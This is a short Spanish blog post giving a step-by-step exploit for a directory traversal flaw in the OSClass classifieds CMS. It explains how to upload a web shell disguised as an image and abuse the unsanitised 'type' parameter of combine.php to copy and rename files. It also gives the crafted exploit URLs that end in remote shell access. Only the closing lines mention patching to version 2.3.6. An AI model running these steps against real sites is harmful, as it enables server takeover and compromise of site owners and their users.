OSClass es un gestor de contenidos (del tipo Joomla o Wordpress) enfocado a la creación de sitios webs de avisos clasificados. Este mini howto, aprovecha una vulnerabilidad encontrada en OSClass, que nos permitirá subir un archivo (en nuestro caso una shell =)
1º Elegir la web shell q mas te guste :P
2º Subir la shell como una imagen para un nuevo item
3º Aprovechamos la falta de saneamiento de la variable "type" del archivo "combine.php", para copiarlo a la carpeta "/oc-content/uploads", o sea a la misma carpeta donde se subió nuestra shell como imagen
http://127.0.0.1/osclass/oc-content/themes/modern/combine.php?type=./../../uploads/combine.php&files=combine.php
4º Utilizamos el combine.php que copiamos en el punto anterior para mover y renombrar nuestra shell
http://127.0.0.1/osclass/oc-content/uploads/combine.php?files=5_original.jpg&type=/../../remote.php
5º Sal y pimienta a gusto.. http://127.0.0.1/osclass/remote.php
todo esta perdido para la gente que utiliza este CMS?? por supuesto que no.. solo deben actualizar a la version 2.3.6 o parsea la variable type!
Para más información ...
http://www.codseq.it/advisories/osclass_directory_traversal_vulnerability
http://osclass.org/
No hay comentarios:
Publicar un comentario